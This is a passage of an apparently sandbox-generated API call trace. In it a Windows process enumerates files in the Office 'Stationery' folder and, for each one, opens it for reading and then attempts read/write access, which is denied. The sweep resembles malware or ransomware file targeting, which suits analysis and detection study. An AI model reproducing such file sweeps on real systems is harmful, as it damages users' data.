dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.341] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.341] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.342] CloseHandle (hObject=0x348) returned 1 [0087.355] AreFileApisANSI () returned 1 [0087.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0087.355] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0087.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 73 [0087.359] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.375] GetLastError () returned 0x5 [0087.375] GetLastError () returned 0x5 [0087.375] SetLastError (dwErrCode=0x5) [0087.375] GetLastError () returned 0x5 [0087.375] SetLastError (dwErrCode=0x5) [0087.375] GetLastError () returned 0x5 [0087.375] SetLastError (dwErrCode=0x5) [0087.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0087.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0087.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.375] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0087.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0087.376] AreFileApisANSI () returned 1 [0087.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", lpUsedDefaultChar=0x0) returned 77 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.377] AreFileApisANSI () returned 1 [0087.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0087.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c500 [0087.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8c500, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 77 [0087.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.378] GetFileType (hFile=0x348) returned 0x1 [0087.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0087.378] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.378] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.378] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.378] CloseHandle (hObject=0x348) returned 1 [0087.379] AreFileApisANSI () returned 1 [0087.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d2c8 [0087.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8d2c8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 77 [0087.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.379] GetLastError () returned 0x5 [0087.379] GetLastError () returned 0x5 [0087.379] SetLastError (dwErrCode=0x5) [0087.379] GetLastError () returned 0x5 [0087.379] SetLastError (dwErrCode=0x5) [0087.379] GetLastError () returned 0x5 [0087.379] SetLastError (dwErrCode=0x5) [0087.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0087.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0087.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.379] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.379] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.380] AreFileApisANSI () returned 1 [0087.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", lpUsedDefaultChar=0x0) returned 76 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.381] AreFileApisANSI () returned 1 [0087.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0087.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85e40 [0087.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 76 [0087.381] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.382] GetFileType (hFile=0x424) returned 0x1 [0087.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0087.382] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.382] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.382] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.382] CloseHandle (hObject=0x424) returned 1 [0087.382] AreFileApisANSI () returned 1 [0087.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0087.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85940 [0087.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 76 [0087.383] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.383] GetLastError () returned 0x5 [0087.383] GetLastError () returned 0x5 [0087.383] SetLastError (dwErrCode=0x5) [0087.383] GetLastError () returned 0x5 [0087.383] SetLastError (dwErrCode=0x5) [0087.383] GetLastError () returned 0x5 [0087.383] SetLastError (dwErrCode=0x5) [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0087.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.383] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.383] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.384] AreFileApisANSI () returned 1 [0087.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", lpUsedDefaultChar=0x0) returned 70 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.384] AreFileApisANSI () returned 1 [0087.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0087.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a368 [0087.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm") returned 70 [0087.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.385] GetFileType (hFile=0x424) returned 0x1 [0087.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 